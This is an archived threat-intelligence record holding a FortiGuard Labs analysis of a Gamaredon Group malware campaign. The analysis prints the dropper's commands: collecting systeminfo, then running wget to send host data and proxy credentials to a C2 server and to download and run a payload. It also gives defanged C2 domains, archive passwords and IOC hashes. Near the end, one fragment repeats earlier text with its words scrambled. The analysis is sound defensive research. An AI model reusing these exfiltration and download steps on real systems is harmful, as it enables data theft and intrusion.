{ "id": "9cf9a0b3-7380-4cc3-814d-a0436bd0b04e", "created_at": "2026-04-06T00:06:17.343426Z", "updated_at": "2026-04-10T03:37:04.248056Z", "deleted_at": null, "sha1_hash": "3a1fb440fc13569a3c5679ee614c38636f2d5cd6", "title": "The Gamaredon Group: A TTP Profile Analysis", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3710068, "plain_text": "The Gamaredon Group: A TTP Profile Analysis\r\nPublished: 2019-08-21 · Archived: 2026-04-05 13:43:37 UTC\r\nA FortiGuard Labs Threat Analysis\r\nFortiGuard Labs recently discovered a fresh malicious campaign being run by the Gamaredon Group possibly\r\ntargeting Ukrainian law enforcement and government agencies. We decided to provide an analysis of the current\r\ncampaign, particularly focusing on the tools and methods used by these malicious actors to try to understand their\r\nmethodologies and what resources are needed to launch these types of attacks.\r\nThe Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and\r\nmilitary departments from the mid-2013s. In one article published in the Kharkiv Observer – an independent\r\nUkranian online publication – an unnamed source stated that even the Ukrainian Presidential Administration has\r\nbeen attacked by malware developed by the Gamaredon Group. In addition, the anonymous cybersecurity experts\r\nreferenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers.\r\nThe group is very active. In addition to the campaign we will analyze in this report, they are also implicated in the\r\nspreading of a new Linux malware – Evil Gnome.\r\nThe Gamaredon Group has been active for more than 6 years, and during that time, their Tactics, Techniques, and\r\nProcedures (TTPs) have mostly remained the same. They primarily target Ukrainian organizations and resources\r\nusing spear-phishing attacks, and they use military or similar documents as bait. Once they have found a victim,\r\nthey then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command\r\nfiles.\r\nCurrent Campaign Analysis\r\nAs an example, we decided to analyze one of their latest samples. The following archive caught our attention for\r\nexploiting a WinRAR unacev2 module vulnerability and for having interesting content. In this case, it looked like\r\nsomeone was using the military conflict in Ukraine to deliver some sort of malware. A quick search for those\r\npatterns gave us the source of the archive – the Gamaredon Group. \r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 1 of 21\n\nFigure 1. Files inside the archive\r\nThe archive contains several decoy files:\r\n1_Миротворець\\заява.jpg\r\nTranslation: Peacemaker\\statement.jpg\r\n \r\n2_Пiнчук\\Пiнчук Андрiй Юрiйович 27.12.1997.docx\r\nTranslation: Pinchuk\\Pinchuk Andrey Yuriyovych 27.12.1997.doc\r\nAndrey Pinchuk is a Ukranian politician with alleged ties to Russia\r\n \r\n3_Хавченко\\Хавченко Дмитро Василiйович 06.01.1966.docx\r\nTranslation: Havchenko \\ Havvchenko Dmitry 06.01.1966.doc\r\nDmitry Havchenko is a Ukranian entrepreneur involved in Ukranian politics who owns the\r\ncryptocurrency exchange WEX.\r\n \r\nD3i_GMCWAAAq_8u.jpg\r\nssu_zakon.docx\r\nTranslation: Security Service of Ukraine_The Law.docx\r\n \r\nSeveral text files\r\nAll of the text files contain old phone billing information, as well as coordinates, numbers, and addresses. We\r\ncannot determine if this information is real or not. Even if it is, this kind of data can be easily found in public\r\ndomains.\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 2 of 21\n\nFigure 2. Billing data\r\nAnother file is used as bait is called ssu_zakon.docx. This document is just a note regarding the Security Service\r\nof Ukraine (SSU) law.\r\nFigure 3. Contents of ssu_zakon.docx\r\nThe archive also contains 2 MS Office documents named correspondingly for the names stated on the decoy\r\nimage - Pinchuk Andriy Yuryevich 27.12.1997.docx and Havchenko Dmitry Vasilyevich 06.01.1966.docx.\r\nThe document names are written in Ukrainian, while the content is written in Russian – and in fact, is just the\r\ntranslated text from the decoy image. The text provides brief information on two persons, listing the address of\r\ntheir registration and information about their military careers.\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 3 of 21\n\nFigure 4. Corresponding document contents\r\nChecking the metadata of two documents, we observed the following:\r\n2_Пiнчук\\Пiнчук Андрiй Юрiйович 27.12.1997.docx\r\nCreated: 10.04.2019 07:33:00\r\nModified: 10.04.2019 07:34:00\r\nCreated by: USER\r\n3_Хавченко\\Хавченко Дмитро Василiйович 06.01.1966.docx\r\nCreated: 10.04.2019 07:35:00\r\nModified: 10.04.2019 07:35:00\r\nCreated by: USER\r\nssu_zakon.docx\r\nCreated: 28.01.2019 06:42:00\r\nModified: 05.04.2019 05:05:00\r\nCreated by: USER\r\nThe files заява.jpg (statement.jpg) and D3i_GMCWAAAq_8u.jpg are the same. The original source of this picture\r\nis a post on a website called Mirotvorets (Peacemaker). The website is known for publishing the personal\r\ninformation of people who are considered to be “enemies of Ukraine.”\r\nThe text on the pictures below talks about Crimea, the military conflict, and about two people who are suspected\r\nof sponsoring the Presidential election campaign of the current president of Ukraine (Volodymyr Zelensky). \r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 4 of 21\n\nFigure 5. Decoy images\r\nThe image date on the image is 7 of April 2019. This is the same day it was published on the Mirotvorets website.\r\nBut one interesting fact is that WinRAR shows the last modification date as 21.02.2019 22:03:\r\nFigure 6. File last modification time\r\nTo understand this time-travel mystery, we decided to check the ACE archive structure.\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 5 of 21\n\nFigure 7. ACE archive structure information\r\nAs you can see on figure 7, the ACE archive contains a date field in MS-DOS format.\r\nIf we convert 02/21/2019, 22:03:06 to an MS-DOS timestamp, we get 0x4E55B063. This would be written as\r\n0x63B0554E in little-endian ordering. Checking our archive, we can find the corresponding field:\r\nFigure 8. Timestamp hex value\r\nNow, if we search for it using \\x63\\xB0\\x55\\x4E, we find this module for a Metasploit Framework:\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 6 of 21\n\nFigure 9. Same value in the Metasploit module\r\nSearching further, we observed an earlier Proof of Concept script that was published on the 27th of February,\r\n2019.\r\nFigure 10. Unacev2.dll vulnerability PoC\r\nThe date listed in the archive was pre-defined and inserted by generator scripts. This fact gives us the idea that the\r\nattackers are utilizing publicly available scripts to pack their payload. The only real timestamps we can currently\r\ntrust are the timestamps extracted from MS Office document metadata. Those are 05.04.2019 and 10.04.2019.\r\nBesides the date and time information, we also have a very generic username of the file creator: USER.\r\nExploit Analysis\r\nThe exploit drops three files on the file system. Each of them has their own application:\r\nFirst, the shortcut called “Goggle Chrome.lnk” is placed on the users’ desktop. As you can see in figure 11, the\r\nactor misspelled the browser name. This shortcut is intended to be clicked on by the user instead of the proper\r\n“Google Chrome” browser. The shortcut has a hardcoded path to the icon, so the proper image will be shown only\r\nif the user has the browser installed on their computer. \r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 7 of 21\n\nFigure 11. Misspelled shortcut\r\nNext, the same shortcut is placed in the Startup folder at %AppData%\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\Goggle Chrome.lnk. This time, the shortcut is placed for persistence purposes. The files\r\nin the startup folder will be executed once the user logs into the system. That way, in case the desktop shortcut\r\nhasn’t been clicked by the user in the current session, the startup file is the backup for the attacker so it can be\r\nexecuted at the next system reboot or user login.\r\nAnd finally, the executable file called “win.exe” is placed in the users’ directory at %userprofile%\\win.exe.\r\nAnalyzing the win.exe File\r\nThe file, dropped to the user folder, is a password-protected self-extracting RAR archive. The file has a\r\ncompilation date of 24.04.2017 18:45:49 (GMT).\r\nFigure 12. Executable file compilation timestamp\r\nKnowing the self-extracting archive compilation date allows us to find the WinRAR software version used by the\r\nattacker. When the SFX archive is created, the compilation date is set close to the timestamp of the corresponding\r\nversion of the WinRAR software used. So, the only version that could give that timestamp is WinRAR 5.50 Beta 1\r\n(x86). Its installer file has its timestamp set to 24.04.2017 18:46:00 (GMT), which is 1 second different from the\r\nSFX malware. Trying to create a self-extracting archive with this version, we got the same date as the one stated\r\nin the malware.\r\nAdditionally, the malicious self-extracting archive contains a fake digital signature of a legitimate Microsoft tool -\r\nSysInternals Autoruns. As you can see in the figure below, the signature fails to pass validation:\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 8 of 21\n\nFigure 13. Fake digital signature\r\nMoving on, to get the archive password we have to check the shortcut that is linked to it.    \r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 9 of 21\n\nFigure 14. Password inside the shortcut\r\nOnce we have a password, we can check the internals of the win.exe file. As can be seen in figure 15, it contains\r\nanother executable file called winlog.exe. Besides that, it has an embedded SFX script that is executed when the\r\narchive data is extracted:\r\nSetup = winlog.exe (Execute after extraction)\r\nSilent = 1 (No windows are shown)\r\nOverwrite = 2 (Do not overwrite)\r\nFigure 15. Contents of “win.exe”\r\nLet’s unpack this file and analyze its content.\r\nThe file is a 7zip SFX archive that tries to look like a mysterious version of Email Microsoft Office Word\r\nsoftware. This time, the file is even older than the previous SFX archive. Although the last modification date is set\r\nto 10.04.2019 13:55:42 (GMT), the compilation timestamp is 05.03.2016 12:06:17 (GMT). Unfortunately, none of\r\nthe 7zip software release dates or versions corresponds to this timestamp, so our previous discovery technique did\r\nnot work in this case.\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 10 of 21\n\nFigure 16. Description of “winlog.exe”\r\nThis self-extracting archive contains two files and a script that is launched at extraction:\r\n!@Install@!UTF-8!\r\nRunProgram=\"hidcon:5493.cmd\"  (Run batch file with hidden console window after extraction)\r\nGUIMode=\"2\" (No windows are shown)\r\nSelfDelete=\"1\" (Delete the archive after extraction)\r\n;!@InstallEnd@!\r\nTo search for any hints of the software used to create this self-extracting archive, we looked into the file with just\r\na text editor. Luckily, there was some information regarding the version and copyright.\r\nFigure 17. Copyright inside the archive\r\nThis time, searching for the copyright, versions, and script we found a custom tool called Modified 7-Zip SFX\r\nmodule for installers, version 1.6.1 Stable build 3873 was used to create the malicious file. This tool is freely\r\ndistributed on the Russian-speaking forum oszone. The custom software produces a 7zip SFX archive with exactly\r\nthe same timestamp as the malicious file.\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 11 of 21\n\nFigure 18. Custom tool posted on the oszone forum\r\nNext, let’s analyze the files contained in the archive.\r\nThe first one is called 5532.cmd, and it is a command prompt (batch) file. The second file is an executable and is\r\ncalled config.exe.\r\nFigure 19. Inside the 7zip SFX archive\r\nLooking into the batch file, we can see that it was not very obfuscated and therefore easy to read.\r\nThe first thing we can see is the configuration information. It has a hardcoded C2 server, filename, and user-agent:\r\nhxxp://lisingrout.ddns[.]net\r\nlibrelogout.exe\r\n\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Firefox/27.0\"\r\nAfter the configuration variables we found the main routine. First, the malware extracts its proxy information\r\nfrom the registry key. HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings. It then saves the\r\nfollowing information:\r\nProxyServer (Proxy server address)\r\nProxyUser (Proxy username)\r\nProxyPass (Proxy password)\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 12 of 21\n\nNext, it gets the name of the computer and generates a unique ID. Once done, it calls  the systeminfo utility and\r\nsaves the whole output to a text file that in our case called ohJlkad.txt:\r\nsysteminfo \u003e ohJlkad.txt\r\nFigure 20. Initial data collection code\r\nAfter that, it waits for 40 seconds using the command:\r\ntimeout /T 40\r\nOnce the timer ends, it will check for the internet connection by launching a ping command and sending 14\r\nrequests to google.com\r\nping –n 14 google.com\r\nOnce finished, it kills the task with the filename stated in the configuration (“librelogout.exe”) and deletes the file.\r\nFinally, it calls the config.exe application to provide several arguments:\r\n--user-agent = [hardcoded UA]\r\n--post-data=”\r\nversiya=wrar\r\ncomp=%computername%\r\nid=[generated from computer name]\r\nsysinfo=[data from ohJlkad.txt]”\r\n \r\n“[C2 Server]”\r\n-q -N “[C2 Server]”\r\n-O “librelogout.exe”\r\nIn case the user is connected to the internet via proxy, it will provide additional arguments to config.exe:\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 13 of 21\n\n-e\r\n--http_proxy=http://[Proxy Server]\r\n--proxy-user=[Proxy username]\r\n--proxy-password=[Proxy password]\r\nAmong the arguments, we see one interesting parameter: versiya = wrar. First, the word Versiya is the Russian\r\nВерсия or Ukranian Версія, and it means version. As it is set to wrar, we can guess that it refers to the way the\r\npayload is being delivered. In this case, the initial file mirotvorec.rar contains an exploit for the WinRAR unacev2\r\nmodule. \r\nFigure 21. Data exfiltration and payload dropping code\r\nAfter the config.exe returns, the script launches the main payload hosted on C2. To sum up the script routine, it\r\ntakes the following actions:\r\nCollects information about the infected host\r\nSends it to the C2 via config.exe\r\nDownloads and launches the main payload\r\nAnalyzing the config.exe file, we found out that it is a legit wget version (v 1.11.4) with OpenSSL support\r\ncompiled for Windows. The file is quite old, as the compilation date goes back to 2009. Apparently, the attackers\r\ndecided to not reinvent the wheel and simply used an open-source solution for exfiltrating the host data and\r\ndownloading the main payload.\r\nGoing Deep into the Shortcut\r\nIn addition to analyzing their techniques, we also decided to collect more information about the attackers.\r\nFortunately, the shortcut they made will help us.\r\nThe shortcuts used in Windows are small files that simplify our lives by providing a fast way to access files,\r\napplications, and URLs. Another fact is that the .lnk shortcuts help simplify the forensic analysis of malicious\r\ncampaigns by providing the amount of the information hidden from the user.\r\nFirst, let’s check the “Goggle Chrome.lnk” by opening its properties:\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 14 of 21\n\nFigure 22. Artifacts in the shortcut\r\nFirst, we see that the shortcut contains a Russian string Доступ в Интернет in the comment field, which translates\r\nto Access to the Internet. This text is shown if one hovers the mouse over the shortcut. The real Google Chrome\r\nshortcut will contain this comment and the text will depend on system language settings. So, we can guess that\r\nWindows with the Russian language pack has been used for forming the malicious shortcut.\r\nAnother artifact left by the attackers is the password they used to unpack win.exe.\r\nThe -p is the argument for WinRAR SFX to use a password when unpacking. So the rest of the string –\r\nfvthbrfycrbte,k.lrb is the password. If you switch your keyboard layout to Russian and type the password\r\ncharacters, you eventually recover an obscene phrase in Russian: “американскиеу**юдки”, that is translated as\r\n“American b**tards”. Is this an Easter egg left by the Gamaredon Group?\r\nNext, let’s move to the shortcut internals. Using the parsers of the .lnk structure, we can extract more information\r\nfrom the file. We decided to use LNK Parser, a tool that can generate very detailed html reports.\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 15 of 21\n\nFigure 23. Part of the report generated by LNK Parser\r\nAs it contains quite a lot of information, we will focus on the most interesting pieces:\r\nThe .lnk file was created on 08.04.2019 09:27:06 (UTC).\r\nThe shortcut was created on a drive with the serial number: 3c76-6c45\r\nAnother path is hardcoded in the shortcut – C:\\Users\\USER\\win.exe. This is probably the same USER that\r\ncreated the decoy MS Office documents.\r\nPC NetBIOS name: user-pc\r\nMAC address of the machine: 08:00:27:BC:C2:24 (VirtualBox)\r\nWe decided to use this information to search for any other samples containing the same MAC address, drive serial\r\nnumber, or any other unique data from the shortcut.\r\nOnce the samples were found, we analyzed and extracted other pieces of information that could also help us with\r\nattribution. The general behavior of the samples found was mostly the same: SFX archive, batch command file,\r\nshortcuts. The only different parts were the bait files and sometimes the batch scripts used by the attackers.\r\nFirst, we looked at a sample very similar to the one we deeply researched – mirotvorec.rar. The name of the\r\narchive is the same as the source of the decoy image shown in figure 4. There were only three main differences we\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 16 of 21\n\nobserved: the lack of decoy files (text files and the ssu_zakon.docx), and different icons used for win.exe and\r\nwinlog.exe. The last one is different. It is user-agent written in the script:\r\n\"Mozilla/5.0 (Linux; Android 7.1.1; SM-J510H Build/NMF26X) Mobile Safari/537.36\"\r\nIt looks like the criminal actors are still experimenting with the campaign, trying different patterns by changing\r\nthe bait and slightly modifying the dropper malware.\r\nWe also discovered a non-political sample called vpnclient-win-msi-5.0.07.0410-k9.exe. The sample does not use\r\nthe WinRAR unacev2.dll vulnerability, and indeed contains a legitimate VPN client tool along with a malicious\r\nscript that is launched in the background. Analyzing the shortcut file used in the sample, we found other\r\ninteresting information left by the actors.\r\nThe sample hash is 5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90.\r\nData extracted from the shortcut included:\r\nCreated: 19.03.2019 07:49:13 (UTC)\r\nC:\\Users\\Carson\\1.exe\r\nCarson (C:\\Пользователи)\r\nNetBIOS name: user-pc\r\nDrive serial number: 3c76-6c45\r\nMAC address: 08:00:27:BC:C2:24\r\nHere we can see the username of an attacker OS account – Carson. The NetBIOS name, hard drive serial number,\r\nand MAC address remained the same.\r\nThis sample has a slight difference in the unpacking method. This time, instead of the shortcut, the attackers hid\r\nthe password inside the batch script.\r\nFigure 24. Password hardcoded in the script\r\nAs in the previous samples, the password is an obscene phrase in Russian written in an English keyboard layout.\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 17 of 21\n\nAnother sample that caught our attention was a .lnk shortcut file called 6228. The hash of the file is:\r\n995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d, and some of the extracted data\r\nfollows:\r\nCreated 01.07.2019 10:36:33 (UTC)\r\nStrings\r\n_7-ZIP (F:\\VZLOM\\SBORKA_SCR)\r\nF:\\VZLOM\\SBORKA_SCR\\_7-ZIP\\WinRAR.exe\r\nNew password used: “dst,bntct,zd;jgegbyljcrbtcerb”\r\n \r\nPC NetBIOS name: шаман-пк\r\nDrive serial number: 3c76-6c45\r\nMAC address: 08:00:27:BC:C2:24\r\nThis time, we observe that the malicious actor changed the VM PC name from user-pc to shaman-pc (written in\r\nRussian). The MAC address and drive serial number are the same. Other interesting artefacts include the paths\r\nthey forgot to clean out. The words VZLOM and SBORKA_SCR are correspondingly translated from Russian as\r\nHacking and SCR Constructor. It means they are using other specialized tools to generate .scr malware. These\r\ntools, based on the drive letter F, are possibly stored on a USB flash drive or share folder connected to the VM.\r\nAnother trace the group left behind is the new SFX unpacking password – “dst,bntct,zd;jgegbyljcrbtcerb” which\r\nis, again, an obscene phrase in Russian written in English keyboard layout.\r\nBesides this, other similar samples were observed:\r\n1. 0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7\r\nLNK shortcut file\r\nCreation date 04/12/2019 10:44:08 UTC\r\nLast modified 05/06/2019 11:45:30 UTC;\r\n \r\nNew password used: gblfhsuyjqyst\r\n2. 79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1\r\nMS Office document\r\nCreate date: 2019:07:22 12:08:00 (GMT)\r\nAuthor: mmkrasny\r\nLast modified by: Користувач Windows\r\nC2: wifc[.]website\r\nThis sample usesVBA macros to drop a payload.  Checking the C2, we can see that it is resolved as\r\n5.252.193[.]204. From another malicious domain that shares the same IP address – wifu[.]site – an additional\r\nsample has been retrieved:\r\n3. bc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 18 of 21\n\n7zip SFX archive\r\nTimeDateStamp – 31.12.2012 00:38:51 GMT)\r\nContains 3 files:\r\n8331.txt\r\n13446.cmd\r\n14638\r\nInside the batch script 13446.cmd, which is a bit different from the discussed sample, we found this additional\r\ninformation:\r\nC2: hxxp://bits-tor[.]host\r\nContains another password: whevelfrb\r\nSchedules a task to achieve persistence\r\nThe information extracted from the samples could now be used to search for any other campaigns ran by this\r\ngroup or link any old campaigns to one actor.\r\nAttackers Profile\r\nAfter we analyzed the data left inside the samples, we went about summarizing the information we had collected\r\nabout them to get an idea of who hides behind that group.\r\nOn one hand, these malicious actors have been operating since mid-2013, so they more than 6 years of experience.\r\nThey are not asking for a ransom\r\nThey only target information from the military, government, and other high-level Ukrainian sources.\r\nThe main infection strategy is spear-phishing, with well-combined bait documents that sometimes cannot\r\nbe found in public.\r\nThey use publicly available legit tools to avoid detection and create their malicious samples.\r\nOn the other hand, the traces they left in the malware highlight some basic mistakes.\r\nThey use poorly-obfuscated batch scripts, that could be easily analyzed\r\nThe leftover paths inside the shortcuts contain usernames, folders and file names. For state-sponsored\r\nhackers, this is very risky because any possible piece of information could unveil the author\r\nMuch of the data is written in Russian and not in Ukrainian\r\nThe passwords contain hateful statements in Russian which look like personal messages from the actor.\r\nThis type of behavior is peculiar to authors seeking self-affirmation, rather than professional\r\ncybercriminals.\r\nConclusion\r\nWhile analyzing a campaign run by the Gamaredon group, we discovered the tools they used to prepare the attack\r\nand found artifacts left behind by the actors that allowed us to perform a large amount of forensic analysis. No\r\ndoubt, the group has strong Russian ties if we rely on how much of that language is used in the malware.\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 19 of 21\n\nSummarizing our observations regarding the Gamaredon group, we can say that the tools and methods used are\r\nmore likely to be associated with political activists rather than with special services. Unfortunately, we do not\r\nhave enough proofs to be sure about that. Further monitoring of their campaigns could probably show us the real\r\nface of Gamaredon.\r\n-= FortiGuard Lion Team =-\r\nMITRE ATT\u0026CK Matrix\r\nIOC\r\n5.252.193[.]204 - Malicious\r\nhxxp://lisingrout.ddns[.]net - Malicious\r\nhxxp://bits-tor[.]host - Malicious\r\nhxxp://bits-tor[.]site - Malicious\r\nhxxp://usbqueshions.ddns[.]net - Malicious\r\nhxxp://librework.ddns[.]net - Malicious\r\nhxxp://wifc[.]website - Malicious\r\nhxxp://wifu[.]site - Malicious\r\n04ed2ad4fa67c8abd635d34017c3d04813690a91282a0446c0505b2af97ce48b - W32/PossibleThreat\r\n0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7 - LNK/Agent.GP!tr\r\n18cd658fac1dd52a75b4eb6558d06dfe5be0e4db7078d72f663c44507449168c - BAT/Pterodo.QW!tr\r\n257f7f67c59ec8f3837c7e4c99b1dc20c5cd0273bd940beef46d5e641393be37 - W32/Pterodo.RN!tr\r\n258ecb059c15178caed309a4861421d9f2436e70fb36fb1bf05e95d8d8d7c7e3 - BAT/Pterodo.SV!tr\r\n3725f82661852d89874a3748302bbf27990d25fc10d28831f1ad35a6c6d3b4bd - LNK/Agent.GP!tr\r\n46638ca3be6cdbd302e84c26bf14bfda6ed0c1353808914b40246c40fdb5b8ed - W32/Generic!tr\r\n5b2c7b05368d825a4f3b10d74074d0803234f918166436d3e48ef7f9faf66461 -W32/Pterodo.RN!tr\r\n5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90 - W32/Generic!tr\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 20 of 21\n\n6b5f4aea458fb737e213714b3dda51f31b03ccb53a6a0501ee608c1bfd0cebb7 - BAT/Pterodo.SV!tr\r\n79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1 - VBA/Agent.ATF!tr.dldr\r\n7ba638e8a53e6d1713b8f045c27170ef4a75c88197c57fffe227ca2ab05271e7 - BAT/Agent.GP!tr\r\n842612d1afdf78cb8893018f3aeeec7df9f5f0ab245fe8e6d6b28519d0787937 - BAT/Pterodo.SV!tr\r\n92b474f037796e67cd2f36199a95c9feff46af7e58f4d528567f3f0a857132bf - LNK/Agent.GP!tr\r\n995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d - LNK/Agent.GP!tr\r\na67167f363c2501d6a1436e5f8c12693d7cf9d2f3ca1f71b21c292f041f91c7a - W32/Pterodo.RN!tr\r\n3b50342b6cd96f400fbf7f00098a7dfcc9561037e4aa0bad8cfeafbb6f17923b - Riskware/PasswordProtected\r\nbc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac -W32/Generic.VA!tr\r\nc7bed1150d1b8b3b97454d1e47b6c246fffc471dd03d5a1d094bdf2d807b8e5e - LNK/Agent.GP!tr\r\nd2bbecda830821ed3a00737c67fecb7985d612af58a31a1ee8488ad0409ed23b - LNK/Agent.GP!tr\r\ne1e31702aad4bd7557a05906eb3004e9a72d77aa57e448379bee9a350cbba657 - BAT/Pterodo.SV!tr\r\nffc438d33f45ea56935f2bb6fca29e71862ecafb8b7e69ea19abd6df2d255075 - BAT/Pterodo.SV!tr    \r\nLearn more about FortiGuard Labs and the FortiGuard Security Services portfolio. Sign up for our weekly\r\nFortiGuard Threat Brief. \r\nRead about the FortiGuard Security Rating Service, which provides security audits and best practices.\r\nSource: https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 21 of 21\n\nattacker. When version of the WinRAR the SFX archive software is created, the compilation used. So, the only date is version that could set close to the give that timestamp of timestamp is WinRAR the corresponding 5.50 Beta 1\n(x86). Its installer file has its timestamp set to 24.04.2017 18:46:00 (GMT), which is 1 second different from the\nSFX malware. Trying to create a self-extracting archive with this version, we got the same date as the one stated\nin the malware. \nAdditionally, the malicious self-extracting archive contains a fake digital signature of a legitimate Microsoft tool-\nSysInternals Autoruns. As you can see in the figure below, the signature fails to pass validation: \n Page 8 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html" ], "report_names": [ "gamaredon-group-ttp-profile-analysis.html" ], "threat_actors": [ { "id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308", "created_at": "2022-10-25T15:50:23.320841Z", "updated_at": "2026-04-10T02:00:05.356444Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard" ], "source_name": "MITRE:Gamaredon Group", "tools": [ "QuietSieve", "Pteranodon", "Remcos", "PowerPunch" ], "source_id": "MITRE", "reports": null }, { "id": "d5156b55-5d7d-4fb2-836f-861d2e868147", "created_at": "2023-01-06T13:46:38.557326Z", "updated_at": "2026-04-10T02:00:03.023048Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "ACTINIUM", "DEV-0157", "Blue Otso", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm", "UAC-0010", "BlueAlpha", "Trident Ursa", "Winterflounder", "Aqua Blizzard", "Actinium" ], "source_name": "MISPGALAXY:Gamaredon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", "Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775433977, "ts_updated_at": 1775792224, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3a1fb440fc13569a3c5679ee614c38636f2d5cd6.pdf", "text": "https://archive.orkl.eu/3a1fb440fc13569a3c5679ee614c38636f2d5cd6.txt", "img": "https://archive.orkl.eu/3a1fb440fc13569a3c5679ee614c38636f2d5cd6.jpg" } }